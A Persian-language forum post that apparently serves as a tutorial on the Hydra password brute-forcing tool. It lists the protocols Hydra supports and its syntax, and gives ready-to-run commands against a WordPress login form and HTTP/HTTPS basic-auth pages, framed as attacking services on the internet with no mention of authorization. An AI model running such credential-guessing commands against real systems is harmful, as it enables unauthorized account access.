SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

تاپیک جامع بروت فورس authentication ها با ابزار hydra

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    تاپیک جامع بروت فورس authentication ها با ابزار hydra

    همانطور که میدانید Hydra ابزاری بسیار سریع و انعطاف پذیر برای ورود به سیستم با بروت فورس است که از پروتکل‌های متعددی پشتیبانی میکند.
    در این پست به بررسی چگونگی استفاده از آن برای brute force سرویس های مختلف موجود در اینترنت میپردازیم.

    Hydra قابلیت حمله به سرویس‌های زیر را دارا میباشد :
    1. asterisk
    2. cisco
    3. cisco-enable
    4. cvs
    5. firebird
    6. ftp
    7. ftps
    8. http[s]-{head|get}
    9. icq
    10. http-proxy
    11. http-proxy-urlenum
    12. http[s]-{get|post}-form
    13. irc
    14. ldap2[s]
    15. ldap3[-{cram|digest}md5][s]
    16. mssql
    17. nntp
    18. oracle-listener
    19. oracle-sid
    20. pcanywhere
    21. pcnfs
    22. pop3[s]
    23. postgres
    24. rdp
    25. redis
    26. rexec
    27. rlogin
    28. rsh
    29. s7-300
    30. sip
    31. smb
    32. smtp[s]
    33. smtp-enum
    34. snmp
    35. socks5
    36. ssh
    37. sshkey
    38. teamspeak
    39. telnet[s]
    40. vmauthd
    41. vnc
    42. xmpp
    همانطور که مشاهده میکنید ابزار Hydra تقریبا تمامی سرویس ها و حالات مهم حمله را در دل خود جا داده است،در ادامه به چگونگی حمله میپردازیم:

    سینتکس(دستور) کلی ابزار به شرح زیر است که در آن با استفاده از پارامتر‌های مورد نیاز چگونگی حمله را برای ابزار مشخص میگردد:
    SYNTAX: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]




    مثال 1 : حمله بروت فورس به فرم لاگین وردپرس :
    hydra -l admin -P passList.txt -vV -f -t 2 172.16.76.132 http-post-form "/wp/Forum/login.php:log=^USER^&pwd=^PASS^:login_error"



    شرح سویچ و آپشن های مورد استفاده در این نوع حمله :

    -l برای مشخص نمودن نام کاربری (یا -L برای معرفی لیستی از نام‌های کاربری)
    -p به منظور مشخص کردن لیست پسوردها برای برنامه
    -vV برای فعال سازی حالت verbose و نمایش نام کاربری و رمز عبور تست شده
    -f برای خروج از فرم زمانی که لاگین موفق بوده است.
    -t برای اجرای taskهای برنامه در حالت موازی - مشخص نمودن تعداد threadها

    مثال 2 : حمله بروت فورس به آدرس با متود GET بر روی HTTP
    <hydra -L <username> -P <wordlist> -t 1 -f -vV <ip address> http-get <url directory


    مثال 3 : حمله بروت فورس به سرویس با متد GET بر روی HTTPS
    <hydra -L <username> -P <wordlist> -t 1 -f -vV <ip address> https-get <url directory, i.ex
    برچسب ها: هیچ یک
قبلی template بعدی
صبر کنید ..
X